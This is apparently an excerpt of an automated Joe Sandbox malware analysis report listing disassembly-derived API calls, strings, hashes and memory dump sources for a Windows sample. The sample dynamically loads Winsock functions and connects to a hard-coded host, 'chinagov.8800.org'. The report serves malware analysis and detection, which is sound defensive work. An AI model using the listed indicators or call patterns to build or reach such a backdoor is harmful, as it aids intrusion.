                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ExitThreadUser$Sleep$sendtosocket$connectinet_addrsend
                                                                                              • String ID: GetTickCount$KERNEL32.dll$WS2_32.dll$WSASocketA$WSAStartup$closesocket$htons$setsockopt
                                                                                              • API String ID: 1875766515-3926040945
                                                                                              • Opcode ID: ca39cd4000dd52fb1d9514fc1105b4bdf8d10fdaecb33af4158a9940e6cff011
                                                                                              • Instruction ID: 108494642a65384e92ce671c93e0be5eb4aeb19d0da13a5ceb95eb50e5242d09
                                                                                              • Opcode Fuzzy Hash: ca39cd4000dd52fb1d9514fc1105b4bdf8d10fdaecb33af4158a9940e6cff011
                                                                                              • Instruction Fuzzy Hash: 6BB118716483446BE314EB64DC05FAF77E5EBC9704F01093EF645BB2D0DAB89904879A
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname), ref: 0040816D
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00408176
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00408185
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00408188
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,setsockopt), ref: 0040819A
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040819D
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSAStartup), ref: 004081AC
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004081AF
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 004081BE
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004081C1
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,WSASocketA), ref: 004081D3
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004081D6
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,gethostname), ref: 004081E5
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004081E8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: %d.%d.%d.%d$($E$P$WS2_32.dll$WSASocketA$WSAStartup$closesocket$gethostbyname$gethostname$htons$setsockopt
                                                                                              • API String ID: 1029625771-3688028543
                                                                                              • Opcode ID: d5bec2df0a0943f906bf46e4146bb6c47795ba2453832fb3d4d13fc28c77d11d
                                                                                              • Instruction ID: 53d6d929515b9e91ab4b685de5499f61474fe8fa857c4809401ddf33aa41e7a7
                                                                                              • Opcode Fuzzy Hash: d5bec2df0a0943f906bf46e4146bb6c47795ba2453832fb3d4d13fc28c77d11d
                                                                                              • Instruction Fuzzy Hash: A1D16EB5D402699BDB20DBA4CD89FEDB7B5EF94304F0040AEE249B7290DBB459C08F59
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 00406C6A
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406C73
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcatA), ref: 00406C81
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406C84
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrcpyA), ref: 00406C92
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406C95
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: $ $.$E$F$GetSystemDirectoryA$I$KERNEL32.dll$P$\$\$\$a$g$i$i$lstrcatA$lstrcpyA$m$n$n$o$o$o$p$p$s
                                                                                              • API String ID: 1029625771-3412716298
                                                                                              • Opcode ID: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                                                                              • Instruction ID: 1cc97e3852dfcfcdc61d028ea0c2383468fb858139331ce9ede19e0ea5d9e28d
                                                                                              • Opcode Fuzzy Hash: 8249b312c4c04751acff0aaaeb5fd0c636e29cc8b9147592e794b1a22bdd32d1
                                                                                              • Instruction Fuzzy Hash: 0041E61114D3C19DE312DA799884A8FBFD55BB6608F481D9EF1C427293C2AAC64CC7BB
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00403389
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00403392
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,closesocket), ref: 0040339D
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 004033A0
                                                                                              • _mbscpy.MSVCRT(?,00000000,EhETHRcLHRAXHREQEAkLEwsTQw==), ref: 004033CF
                                                                                              • strstr.MSVCRT ref: 004033E0
                                                                                              • memset.MSVCRT ref: 004033F9
                                                                                              • strcspn.MSVCRT ref: 00403410
                                                                                              • strncpy.MSVCRT ref: 0040341B
                                                                                              • strcspn.MSVCRT ref: 0040342D
                                                                                              • atoi.MSVCRT(?), ref: 00403437
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 00403468
                                                                                              • connect.WS2_32(00000000,00000002,00000010), ref: 00403477
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadstrcspn$_mbscpyatoiconnectmemsetsocketstrncpystrstr
                                                                                              • String ID: EhETHRcLHRAXHREQEAkLEwsTQw==$WS2_32.dll$closesocket$htons
                                                                                              • API String ID: 2841553729-84791798
                                                                                              • Opcode ID: b0d02812e01bd494b323ff795dfcab75fceb7154f08fe877454a16fbfcbf3fe1
                                                                                              • Instruction ID: 6aa5ca56811b2828efdf987d7b23adbf84b4b011ef7c06a256cd014a8a3b1787
                                                                                              • Opcode Fuzzy Hash: b0d02812e01bd494b323ff795dfcab75fceb7154f08fe877454a16fbfcbf3fe1
                                                                                              • Instruction Fuzzy Hash: D931B871900218BBDB10ABB49D49FDF7A6CAF05314F104577F609F72E1DA785A448BA8
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ADVAPI32.dll,SetServiceStatus), ref: 00405898
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 0040589F
                                                                                              • Sleep.KERNEL32(000001F4), ref: 004058E2
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00405926
                                                                                              • Sleep.KERNEL32(000001F4), ref: 00405961
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$LibraryLoad
                                                                                              • String ID: ADVAPI32.dll$SetServiceStatus
                                                                                              • API String ID: 3235702935-1924299548
                                                                                              • Opcode ID: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                                                                              • Instruction ID: a5c8a0c86872ce331e11fcaa3c45903c56c1e4641523fec5342e9324e04e0236
                                                                                              • Opcode Fuzzy Hash: f244ac2fdfcf7e27f983d47bd2e476e1663f6f9b5c6e818040c90ec42e299550
                                                                                              • Instruction Fuzzy Hash: 6A1158B1121262DBFB105B16EE4CB573AA6F704319F00803AE544B62B2C7B90C54CF3E
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202), ref: 004050DB
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0000407C,00000000,00000000,00000000), ref: 004050ED
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004050FB
                                                                                              • CloseHandle.KERNEL32 ref: 00405107
                                                                                              • closesocket.WS2_32 ref: 00405113
                                                                                              • Sleep.KERNEL32(0000012C), ref: 0040511E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                                                                              • String ID:
                                                                                              • API String ID: 964154963-0
                                                                                              • Opcode ID: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                                                                              • Instruction ID: a79ab9a2dfc38e3776cf33d79ac1821f4f8275b6afc8926fd1558f3327be2bb1
                                                                                              • Opcode Fuzzy Hash: acdea17ffb6ebf0e0777ef3bef69c6420b85cc0412669cd5e548fff47d643c1f
                                                                                              • Instruction Fuzzy Hash: CAE0C972406260FBD3216BA1AE4DDAB3E68FB0A3A1F144235F359B50F5DB340854CBA9
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202), ref: 00405137
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000048AA,00000000,00000000,00000000), ref: 00405149
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00405157
                                                                                              • CloseHandle.KERNEL32 ref: 00405163
                                                                                              • closesocket.WS2_32 ref: 0040516F
                                                                                              • Sleep.KERNEL32(0000012C), ref: 0040517A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleObjectSingleSleepStartupThreadWaitclosesocket
                                                                                              • String ID:
                                                                                              • API String ID: 964154963-0
                                                                                              • Opcode ID: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                                                                              • Instruction ID: 597c19437f16af45fe4c7fafc924f242b911babb52725cfa5b12b60dc2fdca2e
                                                                                              • Opcode Fuzzy Hash: a1bc73832126a13e0e9c6a85bba279eae2266bbde8cda996510bb9685748afbe
                                                                                              • Instruction Fuzzy Hash: D0E0C076406160BFD3216BA1EF4DD9B3E68EF0A361B044135F35AB44F5C6780454CBA9
                                                                                              APIs
                                                                                              • htons.WS2_32(00001F9A), ref: 00404861
                                                                                                • Part of subcall function 00406C10: LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                                                                                • Part of subcall function 00406C10: 6D0C6DE0.KERNEL32(00000000), ref: 00406C23
                                                                                                • Part of subcall function 00406C10: inet_addr.WS2_32(?), ref: 00406C30
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040487F
                                                                                              • connect.WS2_32(00000000,00000002,00000010), ref: 0040488E
                                                                                              • closesocket.WS2_32(00000000), ref: 0040489A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadclosesocketconnecthtonsinet_addrsocket
                                                                                              • String ID: chinagov.8800.org
                                                                                              • API String ID: 2269069743-2288617695
                                                                                              • Opcode ID: 41718983f1c9e5c223780d873f69bff2d5abf28acc2154f537cf20909f978101
                                                                                              • Instruction ID: aa8867dea59f3e018d1c3fe77959f1df48631034d4a5c4a8dfe27a3f3de7d62f
                                                                                              • Opcode Fuzzy Hash: 41718983f1c9e5c223780d873f69bff2d5abf28acc2154f537cf20909f978101
                                                                                              • Instruction Fuzzy Hash: 5DF08235A002247AEB1067A49D0ABEE7668EF09764F104726F721BA1E1D7B84550879D
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,gethostbyname,?,00401454,0040345F,00401454), ref: 00406C1C
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406C23
                                                                                              • inet_addr.WS2_32(?), ref: 00406C30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoadinet_addr
                                                                                              • String ID: WS2_32.dll$gethostbyname
                                                                                              • API String ID: 4063186387-1612545655
                                                                                              • Opcode ID: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                                                                              • Instruction ID: fa684150f8c7a78303bc788c4e7da3796caaeb6c4f1dce52f515438040d0683d
                                                                                              • Opcode Fuzzy Hash: 681b35af2eda01de744f1b5af480ae26578f1e9ffe207a50f620d86b6acd63d2
                                                                                              • Instruction Fuzzy Hash: 2DE09A393042009BE3049B26FE48DAA3BE8DAC9722305407AF942E3260C334C8428A68
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(KERNEL32.dll,GetTickCount,Defghi Klmnopqr Tuv,00403CEF,0000001A), ref: 00406BDB
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00406BE2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: Defghi Klmnopqr Tuv$GetTickCount$KERNEL32.dll
                                                                                              • API String ID: 1029625771-1458725802
                                                                                              • Opcode ID: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                                                                              • Instruction ID: e2b8e24bfa267fa6e9ec36e760088df98f66f050865d098ef55141e691ac327e
                                                                                              • Opcode Fuzzy Hash: 6b3510431a1f1d43bc199626c34209ae12acd185543041aa9819738d571691f0
                                                                                              • Instruction Fuzzy Hash: 69D02272A802129BD30033BADF0FACA7AA99AC83553048037B084F24B4DF38C4404798
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 004051F9
                                                                                              • Sleep.KERNEL32(00000064), ref: 00405207
                                                                                                • Part of subcall function 0040507D: time.MSVCRT(00000000), ref: 00405087
                                                                                                • Part of subcall function 0040507D: localtime.MSVCRT(?), ref: 00405094
                                                                                                • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                                                                              • atoi.MSVCRT(?,?), ref: 0040521C
                                                                                              • Sleep.KERNEL32(00000064), ref: 0040522D
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00405126,00000000,00000000,00000000), ref: 0040523B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$CreateStartupThreadatoilocaltimetimewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1855471192-0
                                                                                              • Opcode ID: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
                                                                                              • Instruction ID: 0daf81d4eef7f1fa0beb5b5478619bf314a177f2874e1709eaed204b22834378
                                                                                              • Opcode Fuzzy Hash: c30f8e3d3a3eb18667b32e940290df3933b8d757251a2c3054581c4aee564ac8
                                                                                              • Instruction Fuzzy Hash: 68F03776D00218AEE71067B0AD4EFBB776CEB08710F000066BA45F60D1D6749D548EB5
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,?), ref: 00405198
                                                                                              • Sleep.KERNEL32(00000064), ref: 004051A6
                                                                                                • Part of subcall function 0040507D: time.MSVCRT(00000000), ref: 00405087
                                                                                                • Part of subcall function 0040507D: localtime.MSVCRT(?), ref: 00405094
                                                                                                • Part of subcall function 0040507D: wsprintfA.USER32 ref: 004050BD
                                                                                              • atoi.MSVCRT(?,?), ref: 004051BB
                                                                                              • Sleep.KERNEL32(00000064), ref: 004051CC
                                                                                              • CreateThread.KERNEL32(00000000,00000000,004050CA,00000000,00000000,00000000), ref: 004051DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$CreateStartupThreadatoilocaltimetimewsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1855471192-0
                                                                                              • Opcode ID: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
                                                                                              • Instruction ID: f150061eb18795c979dcc7452c8c87f20c1a6e1286e61ebe96203e18624e51ff
                                                                                              • Opcode Fuzzy Hash: 8478ef6d704479882cfa9a1bae9e07a4cd0467910b59b270b8e41c6c7fc02dd2
                                                                                              • Instruction Fuzzy Hash: F3F030B6D0022CAEE71067B0AD4EFBB776CEB08710F000066BA45F60D1E6749D848EB9
                                                                                              APIs
                                                                                              • strcmp.MSVCRT ref: 00406731
                                                                                              • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 0040676F
                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040678E
                                                                                              • GetIfTable.IPHLPAPI(00000000,00000000,00000001), ref: 004067C5
                                                                                              • sprintf.MSVCRT ref: 004068CD
                                                                                              • _mbscpy.MSVCRT(-00000023,?,?,?,?,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 004068E7
                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000001,?,?,?,KVa7,00000000,?,?,?,00000400,00000000), ref: 0040693E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Table$??2@??3@_mbscpysprintfstrcmp
                                                                                              • String ID: %u Gbps$KVa7
                                                                                              • API String ID: 3420875952-2796686009
                                                                                              • Opcode ID: 6098c4a6c90d9ca05f699309847211eacf8128fdf5923c6fd41ae41f8db015e8
                                                                                              • Instruction ID: a7a8e1041bd709416f2cdac98afc023946ef9f584d3dcb890be07267fec2ea1a
                                                                                              • Opcode Fuzzy Hash: 6098c4a6c90d9ca05f699309847211eacf8128fdf5923c6fd41ae41f8db015e8
                                                                                              • Instruction Fuzzy Hash: 18210E70A005158BD72ECB04CE94BA9B3BAFB94309F0941FDE10EAB6E5D6356F918F44
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: localtimetimewsprintf
                                                                                              • String ID: %04d%02d%02d
                                                                                              • API String ID: 1360778613-2607228566
                                                                                              • Opcode ID: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                                                                              • Instruction ID: 6ead3e3b7a45fc54b5a265f10b09fe02a5435c176a1f4316584398403dd6ae14
                                                                                              • Opcode Fuzzy Hash: 477ce69a6078d3cf659d0e30f95180734c6d2d8a0b05a3bc6e39ce45df6c2c02
                                                                                              • Instruction Fuzzy Hash: ACF01C32900108AFDF05ABD9DE49FEF7BB8EB48311F100021FA06FA2A1D6755A55DBA5
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(WS2_32.dll,htons), ref: 00402A46
                                                                                              • 6D0C6DE0.KERNEL32(00000000), ref: 00402A4D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: WS2_32.dll$htons
                                                                                              • API String ID: 1029625771-178149120
                                                                                              • Opcode ID: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                                                                              • Instruction ID: 2561ae12f7e90b5fc780e89bc5807c04a20d660f8c717e8047036cfcaa43c05d
                                                                                              • Opcode Fuzzy Hash: d30d6111be414e93e59afff5acc367f2655241c9da2ea0a2795162f196827327
                                                                                              • Instruction Fuzzy Hash: BBC09BB5551280EBC7006B719F0D5453994B6047017100077F141F15F1DB7800409F1D
                                                                                              APIs
                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
                                                                                              • htons.WS2_32 ref: 004086B2
                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 004086C5
                                                                                              • closesocket.WS2_32(00000000), ref: 004086D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_v5.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: closesocketconnecthtonssocket
                                                                                              • String ID:
                                                                                              • API String ID: 3817148366-0
